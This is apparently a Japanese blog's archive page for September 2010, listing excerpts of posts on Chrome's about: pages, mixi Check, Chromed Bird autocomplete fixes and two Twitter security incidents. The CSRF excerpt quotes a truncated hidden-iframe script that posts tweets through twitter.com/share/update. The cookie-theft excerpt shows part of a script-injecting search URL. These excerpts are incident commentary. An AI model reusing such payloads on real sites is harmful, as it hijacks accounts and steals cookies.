2010-09-01から1ヶ月間の記事一覧

twitterでCSRFがあったらしい

web

Twitterでまた悪質リンクが横行――解決済み(ITmedia) 記事はXSSタグが付いているが、実際の攻撃はCSRFのようだ。 <script type="text/javascript"> var el1 = document.createElement('iframe'); el1.style.visibility="hidden"; el1.src = "http://twitter.com/share/update?status=WTF:%20"…

chromeのシステムページ(2)

chrome 7の追加システムページ前回の記事(chromeのシステムページ)とかぶるのですが about:aboutにアクセスすると「about:」ページのリストが表示されるようです. about:appcache-internals about:view-http-cache about:credits about:dns about:histogram…

chromeのシステムページ

chromeのシステムページ(2) chrome 7の追加システムページ自分メモです.chromeの隠しページというか、システムページというかそういうやつです.(更新) About Memory(about:memory) ブラウザ全体でのメモリ使用量,各タブ・プラグイン・拡張での使用メモリ/…

mixiチェックで任意のサイトをチェックする

mixiが新しくmixiチェックというサービスを開始しました。 場所であるとか、ウェブサイトであるとかに"チェック"することで友人と気になる情報を共有するサービスです。foursquare等のウェブ版みたいなイメージでしょうか... このmixiチェックをするためには…

Twitter Cookie盗難について

IT media Twitterで悪質なスクリプトが流通、cookie盗難の恐れ に関する考察なんぞ. 記事中のツイート内容で検索をかけたら簡単に元ツイートまで辿りつけた. 短縮URLの実態としては //dev.twitter.com/search?query=%253C/script%253E%253Cscript%20src=%27(…

Chromed Bird の@補完で大文字小文字を区別しないようにする (2)

Chromed Bird の@補完で大文字小文字を区別しないようにする(1) (Chromed Bird - バージョン: 1.8.5) 1.9でコミットされ修正されました 今回は,前回の続きで@補完の候補を大文字小文字区別しないようにしましたが,表示される候補は大文字と小文字を区別し…

Chromed Bird の@補完で大文字小文字を区別しないようにする

(Chromed Bird - バージョン: 1.8.5) Chromed Bird魔改造第3段になります. 1.9でコミットされ修正されました Chromed Birdはツイート入力欄に@補完機能があります. ツイートの先頭,もしくは空白のあとの@以後にアルファベットを入力すると当てはまるユー…